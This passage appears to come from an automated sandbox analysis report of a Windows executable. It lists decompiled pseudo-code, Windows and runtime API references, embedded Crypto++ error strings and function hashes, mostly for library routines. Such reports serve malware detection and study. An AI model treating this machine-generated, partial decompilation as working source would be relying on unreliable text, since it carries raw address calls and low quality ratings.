					_t13 =  &(_t56->bmiColors); // 0x28
					0xe23f30(_t13, 0, 0x400);
				}
				_t16 = _t53 + 8; // 0x8
				_t32 = CreateDIBSection(0, _t56, 0, _t16, 0, 0);
				if(_t32 == 0) {
					goto L8;
				} else {
					 *(_t53 + 4) = _t32;
					E00D39532(_t53, _t51, (0 | _a8 >= 0x00000000) + 1);
					if((_a24 & 0x00000001) != 0) {
						 *((char*)(_t53 + 0x1d)) = _t41;
					}
					goto L9;
				}
			}

APIs

Part of subcall function 00D35087: _malloc.LIBCMT ref: 00D35098

_memset.LIBCMT ref: 00D35AB7
_memset.LIBCMT ref: 00D35AF1
_memcpy_s.LIBCMT ref: 00D35B0B
CreateDIBSection.GDI32(00000000,00000000,00000000,00000008,00000000,00000000), ref: 00D35B24
_free.LIBCMT ref: 00D35B57

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memset$CreateSection_free_malloc_memcpy_s
String ID:
API String ID: 3499028860-0
Opcode ID: 1b2ebf9ef5f3504accd9dce3e5891c706eef69af0f3d20461d33508f9e2f8b94
Instruction ID: 833a9d30a9c159ad78e7488cc0113d4de4c63471b122977506b5be65e0119da1
Opcode Fuzzy Hash: 1b2ebf9ef5f3504accd9dce3e5891c706eef69af0f3d20461d33508f9e2f8b94
Instruction Fuzzy Hash: DA21D5B1A10719AFD7249F65EC42FABF7A8EF05314F04452DF946D7640E674EA048BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00E27EFD Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00E27F09

Part of subcall function 00E26445: __FF_MSGBANNER.LIBCMT ref: 00E2645C
Part of subcall function 00E26445: __NMSG_WRITE.LIBCMT ref: 00E26463
Part of subcall function 00E26445: RtlAllocateHeap.NTDLL(00550000,00000000,00000001), ref: 00E26488

_free.LIBCMT ref: 00E27F1C

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 45b7f647a36497f87ea3ecfaa6d4be6c4cd192c65ba615a3c3ef53d2c4d8789b
Instruction ID: dbc8804ff0ed48737d50e8d07f9a003ab9c1e1b60b9201d362e0c7f61cf22cf6
Opcode Fuzzy Hash: 45b7f647a36497f87ea3ecfaa6d4be6c4cd192c65ba615a3c3ef53d2c4d8789b
Instruction Fuzzy Hash: 5811733260C23AAFEB212F74BD05B9A36E5AF043A4F207525F99DB6191DF359C409690

Uniqueness

Uniqueness Score: -1.00%

Function 00E6803D Relevance: 7.6, APIs: 5, Instructions: 52registrythreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(00000000,?,00000000,00E78102,000000FF,0000000C), ref: 00E68054
GetLastError.KERNEL32(?,00000000,?,?,?,?,?,00E6DB7C,?,?,?,?,?,00E66FB3,000000FF,?), ref: 00E6805E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E6807D
__CxxThrowException@8.LIBCMT ref: 00E6808B
SetThreadAffinityMask.KERNEL32(?,?), ref: 00E680BE

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AffinityConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastMaskObjectRegisterSingleThreadThrowWait
String ID:
API String ID: 2773543435-0
Opcode ID: 7291b921bb10760a55c64a3c63caea74c39b662e4fd4d3a4959158f2dcfd5150
Instruction ID: 82e1df6ada21221343eb35de4af480dc5af41d7b27ccc4d9f7d706941754aac8
Opcode Fuzzy Hash: 7291b921bb10760a55c64a3c63caea74c39b662e4fd4d3a4959158f2dcfd5150
Instruction Fuzzy Hash: 6C019E31540109FFDF11EFA0ED05AAD3BA9EB04390F209660BA29F51A1DA32DA14AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E6E715 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E6812C: TlsAlloc.KERNEL32(?,?,?), ref: 00E68132
Part of subcall function 00E6812C: GetLastError.KERNEL32 ref: 00E6813D
Part of subcall function 00E6812C: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E68159
Part of subcall function 00E6812C: __CxxThrowException@8.LIBCMT ref: 00E68167
Part of subcall function 00E6812C: TlsFree.KERNEL32(?,?,?,00EFA47C,00000000), ref: 00E68173

TlsAlloc.KERNEL32(?,?,?), ref: 00E784A6
GetLastError.KERNEL32 ref: 00E784B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E784D2
__CxxThrowException@8.LIBCMT ref: 00E784E0
TlsFree.KERNEL32(?,00EFA47C,00000000), ref: 00E784EC

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8FreeLastThrow
String ID:
API String ID: 3166510937-0
Opcode ID: e53117385a6d7849d9ad1bc01d294c2379dfcc8940d3a92667d3a1299dac5f5f
Instruction ID: 09cbc4a41bef8b8eb007cc8cc19908ffba13aae9652811046c177dfc6212f06b
Opcode Fuzzy Hash: e53117385a6d7849d9ad1bc01d294c2379dfcc8940d3a92667d3a1299dac5f5f
Instruction Fuzzy Hash: 2EF0B43044025A9BCB00FB71FD0EAB937ACBB00310B50EA64B53DF11A1EF748104AB56

Uniqueness

Uniqueness Score: -1.00%

Function 00E68189 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,76688560,?,?,?,?,00E66FB3,000000FF,?), ref: 00E68195
GetLastError.KERNEL32(?,?,?,?,00E66FB3,000000FF,?,?,?,?,00E665C6,?,?,00F13138), ref: 00E6819F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E681BB
__CxxThrowException@8.LIBCMT ref: 00E681C9
UnregisterWait.KERNEL32(?), ref: 00E681D5

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowUnregisterValueWait
String ID:
API String ID: 4170064228-0
Opcode ID: 57f87a635d1128ec633aa0fe6da011c203609c1f9ec28981d68831078d3bbdb4
Instruction ID: d1095dd496305108921396cec39035279cbe2ab5dc24b85b0591861019c790a0
Opcode Fuzzy Hash: 57f87a635d1128ec633aa0fe6da011c203609c1f9ec28981d68831078d3bbdb4
Instruction Fuzzy Hash: 11F0A03014020DABCB00BBA2FD09ABE3BACAB00380B505661B91CA1161EF3195149792

Uniqueness

Uniqueness Score: -1.00%

Function 00E6812C Relevance: 7.5, APIs: 5, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?), ref: 00E68132
GetLastError.KERNEL32 ref: 00E6813D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E68159
__CxxThrowException@8.LIBCMT ref: 00E68167
TlsFree.KERNEL32(?,?,?,00EFA47C,00000000), ref: 00E68173

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8FreeLastThrow
String ID:
API String ID: 3166510937-0
Opcode ID: 463419567345a553cc3b0fba1562d0d3fc00f9cd25de2d4cb0a68dea0459febe
Instruction ID: 2a599516875fb0e01444fb01b6ac253fc4f770521c108501c2bf9f865b3d8937
Opcode Fuzzy Hash: 463419567345a553cc3b0fba1562d0d3fc00f9cd25de2d4cb0a68dea0459febe
Instruction Fuzzy Hash: F7E09B3044010CABCB00B7B5FD0A9BD776CAB01361B506B61F92DF15A1DF2195044792

Uniqueness

Uniqueness Score: -1.00%

Function 00E4B97B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E4B982

Part of subcall function 00E4BBDB: __EH_prolog3.LIBCMT ref: 00E4BBE2

Part of subcall function 00D0BC90: _malloc.LIBCMT ref: 00D0BCAC

Strings

AuthenticatedDecryptionFilterFlags, xrefs: 00E4BA64
TruncatedDigestSize, xrefs: 00E4BA79
BlockPaddingScheme, xrefs: 00E4BA49

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$_malloc
String ID: AuthenticatedDecryptionFilterFlags$BlockPaddingScheme$TruncatedDigestSize
API String ID: 1683881009-2369340326
Opcode ID: a6d78b0534cc9a1ff477418c0e8ec9d2c894774e70d9cfc28ff25bf1f1e9c1a9
Instruction ID: 40ccb074513ffc1a4accdb426c7e2c1bf8ef5fde8a4de7833cc5451de4a2f8eb
Opcode Fuzzy Hash: a6d78b0534cc9a1ff477418c0e8ec9d2c894774e70d9cfc28ff25bf1f1e9c1a9
Instruction Fuzzy Hash: AF312670600249BEDB04EFA8D856BEEBBE8AF44304F00549DB55ABB2C2DB70DA04D760

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4588 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00CA4588(intOrPtr __ecx, void* __eflags) {
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr* _t63;
				void* _t64;

				_t50 = __ecx;
				0xe21503(0x98);
				 *((intOrPtr*)(_t64 - 0xa4)) = __ecx;
				_t60 =  *((intOrPtr*)(_t64 + 0xc));
				_t49 =  *((intOrPtr*)(_t64 + 0x10));
				_t30 = E00CA2F01(__eflags);
				 *(_t64 - 4) =  *(_t64 - 4) & 0x00000000;
				_t32 = E00CA2ED4(_t49, _t50, _t64 - 0xa0, _t30, "\', stored \'");
				 *(_t64 - 4) = 1;
				0xe2204e(0xf10c2c, _t64 - 0x58, "NameValuePairs: type mismatch for \'",  *((intOrPtr*)(_t64 + 8)));
				_t34 = E00CA2ED4(_t49, _t60, _t64 - 0x70, _t32, _t32);
				 *(_t64 - 4) = 2;
				_t36 = E00CA2ED4(_t49, _t60, _t64 - 0x28, _t34, "\', trying to retrieve \'");
				 *(_t64 - 4) = 3;
				0xe2204e(0xf10c2c);
				_t38 = E00CA2ED4(_t49, _t49, _t64 - 0x88, _t36, _t36);
				 *(_t64 - 4) = 4;
				_t40 = E00CA2ED4(_t49, _t49, _t64 - 0x40, _t38, 0xe92cd4);
				_t63 =  *((intOrPtr*)(_t64 - 0xa4));
				 *(_t64 - 4) = 5;
				E00CA4197(_t63);
				 *_t63 = 0xe92ca8;
				E00CA23D6(_t64 - 0x40, 1, 0);
				E00CA23D6(_t64 - 0x88, 1, 0);
				E00CA23D6(_t64 - 0x28, 1, 0);
				E00CA23D6(_t64 - 0x70, 1, 0);
				E00CA23D6(_t64 - 0xa0, 1, 0);
				E00CA23D6(_t64 - 0x58, 1, 0);
				 *_t63 = 0xe92ccc;
				 *((intOrPtr*)(_t63 + 0x28)) = _t60;
				 *((intOrPtr*)(_t63 + 0x2c)) = _t49;
				0xe214b2(1, _t40);
				return _t63;
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA4592

Part of subcall function 00CA2F01: __EH_prolog3.LIBCMT ref: 00CA2F08

Part of subcall function 00E2204E: type_info::_Name_base.LIBCMT ref: 00E22055

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

Part of subcall function 00CA23D6: _memmove.LIBCMT ref: 00CA23F6

Strings

', stored ', xrefs: 00CA45B9
', trying to retrieve ', xrefs: 00CA45EB
NameValuePairs: type mismatch for ', xrefs: 00CA45AA

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$H_prolog3_Name_base_memmovetype_info::_
String ID: ', stored '$', trying to retrieve '$NameValuePairs: type mismatch for '
API String ID: 3773968386-3022120042
Opcode ID: 0c21df7f8804cbee789026dce4afabd7a4736773a4a56abf5e4981f0374595a3
Instruction ID: 0cacccaf08f4e19a420410da3663776f748ae4d4167dcf557b5c224f738767cb
Opcode Fuzzy Hash: 0c21df7f8804cbee789026dce4afabd7a4736773a4a56abf5e4981f0374595a3
Instruction Fuzzy Hash: B2317271A40329BADF20EBA4CC42FDEB6A8AF16704F54444DF605B72C2DAF45AC4DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00D32A91 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00D32A91(struct HDC__* _a4) {
				signed int _v8;
				void _v40;
				unsigned int _v98;
				char _v99;
				char _v100;
				unsigned int _v102;
				char _v103;
				char _v104;
				struct tagBITMAPINFOHEADER _v144;
				signed int _t24;
				unsigned int _t33;
				struct HBITMAP__* _t43;
				void* _t44;
				intOrPtr _t45;
				unsigned int _t47;
				signed int _t52;
				void* _t55;
				struct HDC__* _t56;
				signed int _t58;

				_t24 =  *0xf02790; // 0x97f5acff
				_v8 = _t24 ^ _t58;
				_t56 = _a4;
				0xe23f30( &_v144, 0, 0x68, _t55, _t44);
				_t47 =  *0xf0d594; // 0xf0f0f0
				_v144.biCompression = _v144.biCompression & 0x00000000;
				_v144.biPlanes = 1;
				_v144.biBitCount = 1;
				_v104 = _t47 >> 0x10;
				_t45 = 8;
				_v144.biSize = 0x28;
				_v144.biWidth = _t45;
				_v144.biHeight = _t45;
				_v103 = _t47 >> 8;
				_v102 = _t47;
				_t33 = GetSysColor(0x14);
				_v98 = _t33;
				_v100 = _t33 >> 0x10;
				_v99 = _t33 >> 8;
				_t52 = 0;
				do {
					asm("sbb eax, eax");
					 *((intOrPtr*)(_t58 + _t52 * 4 - 0x24)) = ( ~(_t52 & 0x00000001) & 0x5554aaab) + 0x5555aaaa;
					_t52 = _t52 + 1;
				} while (_t52 < _t45);
				_t43 = CreateDIBitmap(_t56,  &_v144, 4,  &_v40,  &_v144, 0);
				0xe2142c();
				return _t43;
			}

0x00d32a9a
0x00d32aa1
0x00d32aa6
0x00d32ab4
0x00d32ab9
0x00d32ac1
0x00d32ac6
0x00d32acd
0x00d32ad6
0x00d32add
0x00d32ae3
0x00d32aed
0x00d32af3
0x00d32af9
0x00d32afc
0x00d32aff
0x00d32b07
0x00d32b0d
0x00d32b15
0x00d32b18
0x00d32b1a
0x00d32b23
0x00d32b2f
0x00d32b33
0x00d32b34
0x00d32b4f
0x00d32b5c
0x00d32b64

APIs

_memset.LIBCMT ref: 00D32AB4
GetSysColor.USER32(00000014), ref: 00D32AFF
CreateDIBitmap.GDI32(?,00000028,00000004,?,00000028,00000000), ref: 00D32B4F

Strings

(, xrefs: 00D32AE3

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: BitmapColorCreate_memset
String ID: (
API String ID: 3930187609-3887548279
Opcode ID: 3c39720976796db201eeaf9838cea9b4e463f729ccf6f8e7ef93885a7f79a2f7
Instruction ID: d29fcceb963cd41633250d63d1fdce84e2ec8b3b87f158d7ceaadb8eecbf2ab6
Opcode Fuzzy Hash: 3c39720976796db201eeaf9838cea9b4e463f729ccf6f8e7ef93885a7f79a2f7
Instruction Fuzzy Hash: 7621B031A5125CDFEB04DFA89C46BEDB7F8EB14300F4040AEE949EB281DA345A08CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00E4BE61 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4BE68

Part of subcall function 00E4BBDB: __EH_prolog3.LIBCMT ref: 00E4BBE2

__CxxThrowException@8.LIBCMT ref: 00E4BF0D

Strings

StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher, xrefs: 00E4BEDE
BlockPaddingScheme, xrefs: 00E4BF1B

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3H_prolog3_Throw
String ID: BlockPaddingScheme$StreamTransformationFilter: please use AuthenticatedEncryptionFilter and AuthenticatedDecryptionFilter for AuthenticatedSymmetricCipher
API String ID: 3648411918-3582606076
Opcode ID: fe795391cad7ee792b2ed157ad3d77c11fd19fed78ecf11e09aad4353b51da30
Instruction ID: f68276f1ccab0ba854ca12600502cde92902e09b76375992352a873640f7b159
Opcode Fuzzy Hash: fe795391cad7ee792b2ed157ad3d77c11fd19fed78ecf11e09aad4353b51da30
Instruction Fuzzy Hash: FD2171B0A00359AFDB00EF94C946B9DBBE8BF58304F445459E509B7382DBB4EA04DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CA736D
std::_Xinvalid_argument.LIBCPMT ref: 00CA73A5

Strings

string too long, xrefs: 00CA73A0
invalid string position, xrefs: 00CA7396

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: invalid string position$string too long
API String ID: 256744135-4289949731
Opcode ID: e60acf62627d77b0b8ac9786ef72a26e84637bd3d2e9979cd0d5c56abe55601a
Instruction ID: 22ccd21540e06a22c2dfb7b83a67bd251b070af12100dce81b3cf0d0b46d2331
Opcode Fuzzy Hash: e60acf62627d77b0b8ac9786ef72a26e84637bd3d2e9979cd0d5c56abe55601a
Instruction Fuzzy Hash: AD11B131306306AFDF248F6DDC84A2AB7A9FB42768B140A2DF826D7291C770ED44D794

Uniqueness

Uniqueness Score: -1.00%

Function 00E4D8B2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4D8B9

Part of subcall function 00CA40CA: __EH_prolog3.LIBCMT ref: 00CA40D1

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00E4D91A

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

InputBuffer, xrefs: 00E4D8DA
StringStore: missing InputBuffer argument, xrefs: 00E4D8EB

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$ExceptionException@8H_prolog3_RaiseThrow
String ID: InputBuffer$StringStore: missing InputBuffer argument
API String ID: 1185993512-2380213735
Opcode ID: c185453a3e80fb776cbdcbe799c107f0d85028ee2c6ccbdee4611272a9299160
Instruction ID: 91a1dc87b4566619cf18f31d77a6fe940d25f52fc09560429e77bb459732bb0e
Opcode Fuzzy Hash: c185453a3e80fb776cbdcbe799c107f0d85028ee2c6ccbdee4611272a9299160
Instruction Fuzzy Hash: C0118C70A00308AFCF04EFA4D896ADDBBF5AF55314F105159E509BB282CBB0AA45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E49B4B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E49B55
__CxxThrowException@8.LIBCMT ref: 00E49BB4

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

Strings

Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 00E49BC3
Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 00E49B85

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

